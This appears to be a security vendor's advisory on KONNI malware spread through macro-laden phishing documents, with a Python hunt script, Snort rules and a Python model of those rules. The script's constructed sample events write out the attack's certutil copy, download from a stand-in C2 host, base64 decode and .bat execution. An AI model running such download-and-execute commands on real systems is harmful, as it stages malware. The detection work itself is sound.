Phishing emails used to load KONNI Malware

Summary:

The Cybersecurity and Infrastructure Security Agency (CISA) and our SOC have observed cyber actors using emails containing a Microsoft Word document with malicious Visual Basic for Applications (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) that malicious cyber actors use to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Tech Details:

KONNI malware can be delivered via phishing emails as a Microsoft Word document carrying malicious VBA macro code. The macro changes the document's font color from light grey to black (a lure to get the user to enable content), checks whether the Windows operating system is 32-bit or 64-bit, and constructs and executes a command line that downloads additional files.

Once the VBA macro has constructed the command line, it uses the certificate utility certutil.exe to download remote files from a given URL, and it relies on certutil's built-in decode function to turn base64-encoded files back into binaries. The command prompt silently copies certutil.exe into a temp directory and renames it, so that detections keyed on the binary's file name do not fire.

The renamed copy then downloads a text file from a remote resource containing a base64-encoded string, decodes it, and saves the result as a batch (.BAT) file. Finally, the text file is deleted from the temp directory and the .BAT file is executed.
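The chain above leaves a distinctive trail in endpoint process-creation telemetry. The following is an added example, not code from the original post, from CISA or from the KONNI operators: a small Python hunt that runs a handful of detections over constructed records modelled on Sysmon Event ID 1 fields (Image, ParentImage, OriginalFileName, CommandLine). It flags an Office application spawning a shell, certutil.exe being copied, a binary whose PE OriginalFileName is CertUtil.exe running under another name, the -urlcache download and -decode switches regardless of the binary's name, and a .BAT launched out of the temp directory. The paths, file names and URL in the sample events are made up.

```python
"""Hunt for the certutil-based loader chain described above in process-creation
telemetry. Added example: the events below are constructed records modelled on
Sysmon Event ID 1 fields, not real logs from the KONNI campaign."""
import re
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events (paths, names and URL are made up).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 0: benign - cmd.exe started from Explorer
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe"',
    },
    {   # 1: the macro's command line copies certutil.exe to %TEMP% under a new name
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r"cmd /c copy /y C:\Windows\System32\certutil.exe %TEMP%\wupd.exe",
    },
    {   # 2: the renamed copy downloads the base64 text file
        "Image": r"C:\Users\u\AppData\Local\Temp\wupd.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"wupd.exe -urlcache -split -f http://c2.example.invalid/dl.txt %TEMP%\dl.txt",
    },
    {   # 3: the renamed copy decodes it into a batch file
        "Image": r"C:\Users\u\AppData\Local\Temp\wupd.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"wupd.exe -decode %TEMP%\dl.txt %TEMP%\run.bat",
    },
    {   # 4: the batch file is executed from %TEMP%
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r"cmd /c %TEMP%\run.bat",
    },
    {   # 5: benign - an administrator verifying a certificate with the real certutil
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -verify server.cer",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings_for(ev: Dict[str, str]) -> List[str]:
    """Return the names of the detections a single event triggers."""
    hits: List[str] = []
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    orig = ev.get("OriginalFileName", "").lower()   # PE version-info name, as Sysmon records it
    cmd = ev["CommandLine"].lower()
    is_certutil = orig == "certutil.exe" or image == "certutil.exe"

    # 1. An Office application spawning a shell: the macro launching cmd.exe.
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
    # 2. certutil.exe being copied somewhere else: the staging step before the rename.
    if image == "cmd.exe" and re.search(r"\bcopy\b.*certutil\.exe", cmd):
        hits.append("certutil_copied")
    # 3. The binary's PE name is CertUtil but the file on disk is called something else.
    if orig == "certutil.exe" and image != "certutil.exe":
        hits.append("certutil_renamed")
    # 4. certutil (under any name) used to fetch a URL or to base64-decode a file.
    if is_certutil and re.search(r"[-/]urlcache\b", cmd) and re.search(r"https?://", cmd):
        hits.append("certutil_download")
    if is_certutil and re.search(r"[-/]decode\b", cmd):
        hits.append("certutil_decode")
    # 5. A shell running a batch file out of the temp directory.
    if image == "cmd.exe" and re.search(r'(%temp%|\\temp\\)[^\s"]*\.bat\b', cmd):
        hits.append("bat_from_temp")
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> detections, for events that triggered at least one."""
    return {i: f for i, ev in enumerate(events) if (f := findings_for(ev))}


if __name__ == "__main__":
    for idx, names in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

The rename check is the one that survives the evasion the post describes: Sysmon's OriginalFileName comes from the PE version resource, so the copy in %TEMP% still says CertUtil.exe no matter what it was renamed to. The two benign events (Explorer launching cmd.exe, and a real certutil -verify) produce no findings, which is the false-positive check worth keeping when these rules are ported into a SIEM.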

Traditional signature- and heuristic-based endpoint protection and antivirus need a signature update before they can detect a chain like this, which abuses a legitimate, signed Windows binary (certutil.exe) rather than dropping a recognizable malware file. Our 24×7 threat hunting team catches such C2 remote access trojans by inspecting your system logs through multiple Security Information and Event Management (SIEM) systems.

If you have any questions about how to protect your business or organization from advanced phishing attacks, or how to detect these types of compromises in your environment, schedule an appointment with a security and systems analyst today! It only takes 15 seconds!

More information on KONNI: https://attack.mitre.org/software/S0356/

Signatures:

These three Snort rules match KONNI's HTTP command-and-control traffic: requests whose URI begins with /weget/ and ends in a short .php name, POSTs whose User-Agent header is literally "HTTP", and POSTs to the /weget/upload.php, /weget/uploadtm.php or /weget/download.php endpoints. All three carry sid:1, so give each a unique SID in the local range (1000000 and above) before loading them. Note also that the first rule's negated header match is spelled "Referrer"; the real HTTP header is "Referer", so that negation does not exclude requests that carry a correctly spelled Referer header.

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI contains '/weget/*.php' (KONNI)"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; depth:7; offset:0; fast_pattern; content:".php"; http_uri; distance:0; within:12; content:!"Referrer|3a 20|"; http_header; classtype:http-uri; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|HTTP|0d 0a|"; http_header; fast_pattern:only; content:"POST"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; fast_pattern:only; pcre:"/^\/weget\x2f(?:upload|uploadtm|download)\.php/iU"; content:"POST"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)
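To see exactly what each rule does and does not fire on, here is an added example (not part of the original post, and not Snort itself) that re-implements the three rules' matching logic in Python and runs it over constructed HTTP requests. The header-buffer model is a simplification of Snort's normalised http_header buffer, and the host names and paths are made up. The last request shows the within:12 limit on the first rule's ".php" match, and the third shows that a correctly spelled Referer header does not trip that rule's negated "Referrer" match.

```python
"""Python re-implementation of the three KONNI Snort rules' matching logic,
run over constructed HTTP requests. Added example; the requests are not captured
traffic and the header buffer is a simplified model of Snort's http_header."""
import re
from typing import Dict, List, NamedTuple


class Request(NamedTuple):
    method: str
    uri: str
    headers: Dict[str, str]  # header name -> value, in send order


def header_buffer(req: Request) -> bytes:
    """Approximation of Snort's http_header buffer: 'Name: value\\r\\n' lines."""
    return b"".join(f"{k}: {v}\r\n".encode() for k, v in req.headers.items())


def rule_weget_php(req: Request) -> bool:
    """Rule 1: '/weget/' at URI offset 0, '.php' lying within the next 12 bytes,
    and no 'Referrer: ' header (the rule's double-r spelling, reproduced here)."""
    uri = req.uri.encode()
    if uri[:7] != b"/weget/":              # content:"/weget/"; http_uri; depth:7; offset:0
        return False
    if uri.find(b".php", 7, 7 + 12) < 0:   # content:".php"; http_uri; distance:0; within:12
        return False
    return b"Referrer: " not in header_buffer(req)  # content:!"Referrer|3a 20|"; http_header


def rule_ua_http(req: Request) -> bool:
    """Rule 2: POST (nocase) whose User-Agent header is exactly 'HTTP'."""
    return req.method.upper() == "POST" and b"User-Agent: HTTP\r\n" in header_buffer(req)


# pcre:"/^\/weget\x2f(?:upload|uploadtm|download)\.php/iU"  (U = match against the URI)
WEGET_PCRE = re.compile(rb"^/weget/(?:upload|uploadtm|download)\.php", re.IGNORECASE)


def rule_weget_endpoints(req: Request) -> bool:
    """Rule 3: case-sensitive POST to one of the three /weget/ endpoints, anchored at URI start."""
    uri = req.uri.encode()
    return req.method == "POST" and b"/weget/" in uri and WEGET_PCRE.match(uri) is not None


RULES = {
    "weget_php": rule_weget_php,
    "ua_http": rule_ua_http,
    "weget_endpoints": rule_weget_endpoints,
}


def evaluate(req: Request) -> Dict[str, bool]:
    """Which of the three rules fire on one request."""
    return {name: fn(req) for name, fn in RULES.items()}


# Constructed requests (not captured traffic); host names and paths are made up.
SAMPLES: List[Request] = [
    Request("POST", "/weget/upload.php", {"Host": "c2.example.invalid", "User-Agent": "HTTP"}),
    Request("GET", "/weget/download.php", {"Host": "c2.example.invalid", "User-Agent": "Mozilla/5.0"}),
    Request("POST", "/weget/uploadtm.php", {"Host": "c2.example.invalid",
                                             "Referer": "http://c2.example.invalid/",
                                             "User-Agent": "HTTP"}),
    Request("POST", "/api/weget/upload.php", {"Host": "c2.example.invalid", "User-Agent": "HTTP"}),
    Request("GET", "/weget/verylongname.php", {"Host": "c2.example.invalid", "User-Agent": "Mozilla/5.0"}),
]


def run_all() -> List[Dict[str, bool]]:
    return [evaluate(r) for r in SAMPLES]


if __name__ == "__main__":
    for req, res in zip(SAMPLES, run_all()):
        fired = [n for n, hit in res.items() if hit] or ["-"]
        print(f"{req.method:4} {req.uri:26} -> {', '.join(fired)}")
```

Running it prints which rules fire on each request: the GET to /weget/download.php is caught only by the first rule (the other two require POST), the request under /api/ is missed by both URI rules because they are anchored at offset 0, and /weget/verylongname.php escapes the first rule because ".php" falls outside the 12-byte window after "/weget/".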